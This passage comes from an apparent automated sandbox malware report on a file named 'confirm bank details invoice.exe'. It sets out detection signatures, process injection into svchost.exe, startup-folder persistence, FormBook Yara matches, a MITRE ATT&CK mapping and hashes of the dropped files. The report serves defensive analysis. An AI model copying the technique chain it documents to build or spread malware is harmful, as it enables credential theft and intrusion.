                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036429A0 mov eax, dword ptr fs:[00000030h]3_2_036429A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036429A0 mov eax, dword ptr fs:[00000030h]3_2_036429A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036429A0 mov eax, dword ptr fs:[00000030h]3_2_036429A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036309AD mov eax, dword ptr fs:[00000030h]3_2_036309AD
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036309AD mov eax, dword ptr fs:[00000030h]3_2_036309AD
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B89B3 mov esi, dword ptr fs:[00000030h]3_2_036B89B3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B89B3 mov eax, dword ptr fs:[00000030h]3_2_036B89B3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B89B3 mov eax, dword ptr fs:[00000030h]3_2_036B89B3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036BE872 mov eax, dword ptr fs:[00000030h]3_2_036BE872
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036BE872 mov eax, dword ptr fs:[00000030h]3_2_036BE872
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C6870 mov eax, dword ptr fs:[00000030h]3_2_036C6870
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C6870 mov eax, dword ptr fs:[00000030h]3_2_036C6870
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03642840 mov ecx, dword ptr fs:[00000030h]3_2_03642840
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03660854 mov eax, dword ptr fs:[00000030h]3_2_03660854
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03634859 mov eax, dword ptr fs:[00000030h]3_2_03634859
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03634859 mov eax, dword ptr fs:[00000030h]3_2_03634859
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004AA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_004AA66C
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_00498189 SetUnhandledExceptionFilter,0_2_00498189
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004981AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004981AC
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D48189 SetUnhandledExceptionFilter,2_2_00D48189
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D481AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D481AC

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: AB4008Jump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3302008Jump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004AB106 LogonUserW,0_2_004AB106
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_00473D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00473D19
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004B411C SendInput,keybd_event,0_2_004B411C
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004B74E7 mouse_event,0_2_004B74E7
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\confirm bank details invoice.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Vevina\deblaterate.exe "C:\Users\user\AppData\Local\Vevina\deblaterate.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Vevina\deblaterate.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004AA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_004AA66C
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004B71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_004B71FA
                  Source: confirm bank details invoice.exe, deblaterate.exeBinary or memory string: Shell_TrayWnd
                  Source: confirm bank details invoice.exe, deblaterate.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004965C4 cpuid 0_2_004965C4
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004C091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_004C091D
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004EB340 GetUserNameW,0_2_004EB340
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004A1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_004A1E8E
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_0048DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0048DDC0
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.2462871861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2352206461.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2463196003.0000000003160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2352898550.0000000003390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: deblaterate.exeBinary or memory string: WIN_81
                  Source: deblaterate.exeBinary or memory string: WIN_XP
                  Source: deblaterate.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                  Source: deblaterate.exeBinary or memory string: WIN_XPe
                  Source: deblaterate.exeBinary or memory string: WIN_VISTA
                  Source: deblaterate.exeBinary or memory string: WIN_7
                  Source: deblaterate.exeBinary or memory string: WIN_8

                  Remote Access Functionality

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.2462871861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2352206461.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2463196003.0000000003160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2352898550.0000000003390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004C8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_004C8C4F
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004C923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004C923B
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D78C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00D78C4F
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D7923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00D7923B

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting                  		2
                  Valid Accounts                  		3
                  Native API                  		111
                  Scripting                  		1
                  Exploitation for Privilege Escalation                  		1
                  Disable or Modify Tools                  		21
                  Input Capture                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory1
                  Account Discovery                  		Remote Desktop Protocol21
                  Input Capture                  		1
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt2
                  Valid Accounts                  		2
                  Valid Accounts                  		2
                  Obfuscated Files or Information                  		Security Account Manager2
                  File and Directory Discovery                  		SMB/Windows Admin Shares3
                  Clipboard Data                  		SteganographyAutomated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron2
                  Registry Run Keys / Startup Folder                  		21
                  Access Token Manipulation                  		1
                  DLL Side-Loading                  		NTDS116
                  System Information Discovery                  		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection                  		1
                  Masquerading                  		LSA Secrets25
                  Security Software Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                  Registry Run Keys / Startup Folder                  		2
                  Valid Accounts                  		Cached Domain Credentials2
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                  Virtualization/Sandbox Evasion                  		DCSync3
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Access Token Manipulation                  		Proc Filesystem1
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                  Process Injection                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  confirm bank details invoice.exe34%ReversingLabsWin32.Trojan.AutoitInject
                  confirm bank details invoice.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Vevina\deblaterate.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Vevina\deblaterate.exe34%ReversingLabsWin32.Trojan.AutoitInject

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  World Map of Contacted IPs

                  No contacted IP infos

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1560108
                  Start date and time:2024-11-21 12:18:09 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 11s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:9
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:confirm bank details invoice.exe
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.winEXE@10/6@0/0
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 98%
                  • Number of executed functions: 57
                  • Number of non-executed functions: 298
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: confirm bank details invoice.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  06:19:28API Interceptor6x Sleep call for process: svchost.exe modified
                  12:19:15AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASNs

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\aut303.tmp

                  Download File
                  Process:C:\Users\user\AppData\Local\Vevina\deblaterate.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):289280
                  Entropy (8bit):7.994331606146315
                  Encrypted:true
                  SSDEEP:6144:AFj+OYGuxHZYnB+nXTKcbq939pphGID+XQTiJUfAOQQQf:AV+FGuNugnDq99jDfCnn
                  MD5:61475B99C1154F36B432BE3EB6CC578B
                  SHA1:D6CA730B6A4C1AF8955DF14E64A11CEC0EABEF88
                  SHA-256:78E11ABAB7FBE52EC56C20386D6047890BCD9EC9D21B73A0ECEE4300FC69F33D
                  SHA-512:2F0948DB4B365777168F210F8CFBA6CF9FC0EF56914BE01B3DE47B4E745CBEF0D7E2F196348DA5F123FCA2BF19641E1D9BB39CF7AEBF258F9B86999F59D2A416
                  Malicious:false
                  Reputation:low
                  Preview:...76G7X@PKL..70.AGQQM75.7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM.5G7V[.EL.L...@..p._\4.(6?,>3(.SX/)>%mUPgE-*p""r.xc.,(54c:8M.XDPKLREN10.z16..U .e$7.V....Y&.K....'P.^..n%P.k($9l-P.G7XDPKLR.r09.FPQ....7XDPKLRE.0;@LPZM7mC7XDPKLRE7P-AGQAM7573XDP.LRU709CGQWM75G7XDVKLRE709A7UQM55G7XDPIL..70)AGAQM75W7XTPKLRE7 9AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE.D\93QQMSbC7XTPKL.A70)AGQQM75G7XDPKLrE7P9AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKL

                  C:\Users\user\AppData\Local\Temp\autC696.tmp

                  Download File
                  Process:C:\Users\user\Desktop\confirm bank details invoice.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):289280
                  Entropy (8bit):7.994331606146315
                  Encrypted:true
                  SSDEEP:6144:AFj+OYGuxHZYnB+nXTKcbq939pphGID+XQTiJUfAOQQQf:AV+FGuNugnDq99jDfCnn
                  MD5:61475B99C1154F36B432BE3EB6CC578B
                  SHA1:D6CA730B6A4C1AF8955DF14E64A11CEC0EABEF88
                  SHA-256:78E11ABAB7FBE52EC56C20386D6047890BCD9EC9D21B73A0ECEE4300FC69F33D
                  SHA-512:2F0948DB4B365777168F210F8CFBA6CF9FC0EF56914BE01B3DE47B4E745CBEF0D7E2F196348DA5F123FCA2BF19641E1D9BB39CF7AEBF258F9B86999F59D2A416
                  Malicious:false
                  Reputation:low
                  Preview:...76G7X@PKL..70.AGQQM75.7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM.5G7V[.EL.L...@..p._\4.(6?,>3(.SX/)>%mUPgE-*p""r.xc.,(54c:8M.XDPKLREN10.z16..U .e$7.V....Y&.K....'P.^..n%P.k($9l-P.G7XDPKLR.r09.FPQ....7XDPKLRE.0;@LPZM7mC7XDPKLRE7P-AGQAM7573XDP.LRU709CGQWM75G7XDVKLRE709A7UQM55G7XDPIL..70)AGAQM75W7XTPKLRE7 9AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE.D\93QQMSbC7XTPKL.A70)AGQQM75G7XDPKLrE7P9AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKL

                  C:\Users\user\AppData\Local\Temp\autCED4.tmp

                  Download File
                  Process:C:\Users\user\AppData\Local\Vevina\deblaterate.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):289280
                  Entropy (8bit):7.994331606146315
                  Encrypted:true
                  SSDEEP:6144:AFj+OYGuxHZYnB+nXTKcbq939pphGID+XQTiJUfAOQQQf:AV+FGuNugnDq99jDfCnn
                  MD5:61475B99C1154F36B432BE3EB6CC578B
                  SHA1:D6CA730B6A4C1AF8955DF14E64A11CEC0EABEF88
                  SHA-256:78E11ABAB7FBE52EC56C20386D6047890BCD9EC9D21B73A0ECEE4300FC69F33D
                  SHA-512:2F0948DB4B365777168F210F8CFBA6CF9FC0EF56914BE01B3DE47B4E745CBEF0D7E2F196348DA5F123FCA2BF19641E1D9BB39CF7AEBF258F9B86999F59D2A416
                  Malicious:false
                  Reputation:low
                  Preview:...76G7X@PKL..70.AGQQM75.7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM.5G7V[.EL.L...@..p._\4.(6?,>3(.SX/)>%mUPgE-*p""r.xc.,(54c:8M.XDPKLREN10.z16..U .e$7.V....Y&.K....'P.^..n%P.k($9l-P.G7XDPKLR.r09.FPQ....7XDPKLRE.0;@LPZM7mC7XDPKLRE7P-AGQAM7573XDP.LRU709CGQWM75G7XDVKLRE709A7UQM55G7XDPIL..70)AGAQM75W7XTPKLRE7 9AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE.D\93QQMSbC7XTPKL.A70)AGQQM75G7XDPKLrE7P9AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKL

                  C:\Users\user\AppData\Local\Temp\epistemology

                  Download File
                  Process:C:\Users\user\Desktop\confirm bank details invoice.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):289280
                  Entropy (8bit):7.994331606146315
                  Encrypted:true
                  SSDEEP:6144:AFj+OYGuxHZYnB+nXTKcbq939pphGID+XQTiJUfAOQQQf:AV+FGuNugnDq99jDfCnn
                  MD5:61475B99C1154F36B432BE3EB6CC578B
                  SHA1:D6CA730B6A4C1AF8955DF14E64A11CEC0EABEF88
                  SHA-256:78E11ABAB7FBE52EC56C20386D6047890BCD9EC9D21B73A0ECEE4300FC69F33D
                  SHA-512:2F0948DB4B365777168F210F8CFBA6CF9FC0EF56914BE01B3DE47B4E745CBEF0D7E2F196348DA5F123FCA2BF19641E1D9BB39CF7AEBF258F9B86999F59D2A416
                  Malicious:false
                  Reputation:low
                  Preview:...76G7X@PKL..70.AGQQM75.7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM.5G7V[.EL.L...@..p._\4.(6?,>3(.SX/)>%mUPgE-*p""r.xc.,(54c:8M.XDPKLREN10.z16..U .e$7.V....Y&.K....'P.^..n%P.k($9l-P.G7XDPKLR.r09.FPQ....7XDPKLRE.0;@LPZM7mC7XDPKLRE7P-AGQAM7573XDP.LRU709CGQWM75G7XDVKLRE709A7UQM55G7XDPIL..70)AGAQM75W7XTPKLRE7 9AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE.D\93QQMSbC7XTPKL.A70)AGQQM75G7XDPKLrE7P9AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKLRE709AGQQM75G7XDPKL

                  C:\Users\user\AppData\Local\Vevina\deblaterate.exe

                  Download File
                  Process:C:\Users\user\Desktop\confirm bank details invoice.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):1214464
                  Entropy (8bit):7.147575666685172
                  Encrypted:false
                  SSDEEP:24576:Ltb20pkaCqT5TBWgNQ7aw5d1UaOV9VOuO6YJ4xdO6A:IVg5tQ7awT1UasVOlk+5
                  MD5:AAC8FCCDEA2F379BB5C27EDF267427FD
                  SHA1:E193C96E5D20E5F296FC8BF84145BFDBE8CE1CFC
                  SHA-256:2FAACF34E9482CBF4D1B032AF7193B4C1ECD419DA8377D47E1A307F17B77BC27
                  SHA-512:E75A3C3807988DBF2DE5BF9FDF2787C91E2CB1190D3DB3FE1D857D611085F14271F830053B7EA0EC3A7F6160DEBD69EEBB501D385724B1CE3EA0E7A84C216AF2
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 34%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L...f.>g..........".................t_............@.................................c.....@...@.......@......................p..|....@..\....................@..Ll..................................0'..@...............`............................text...O........................... ..`.rdata..B...........................@..@.data...T........b..................@....rsrc...\....@......................@..@.reloc..t....@......................@..B................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs

                  Download File
                  Process:C:\Users\user\AppData\Local\Vevina\deblaterate.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):278
                  Entropy (8bit):3.4091704201961828
                  Encrypted:false
                  SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1hDoMlIAnriIM8lfQVn:DsO+vNlzQ1WMlPmA2n
                  MD5:63C617383623F735E208DFC2E005C1AA
                  SHA1:339364CC799FE9863594EBAF38CCFB9008EF5854
                  SHA-256:44E6BDE15A8327E130E0B68D7615859CD5ECE68E51E4B50CB7AA2DBB1713C41B
                  SHA-512:F074A18E5EB9A85E41E57ABE5BC7C69E94BCC87B448EEE18A0BA308894EED8C4F798B4221BA3D7364C4EB060C003FFA58E6397BABBD2E780F1AF1CFDA95BE664
                  Malicious:true
                  Reputation:low
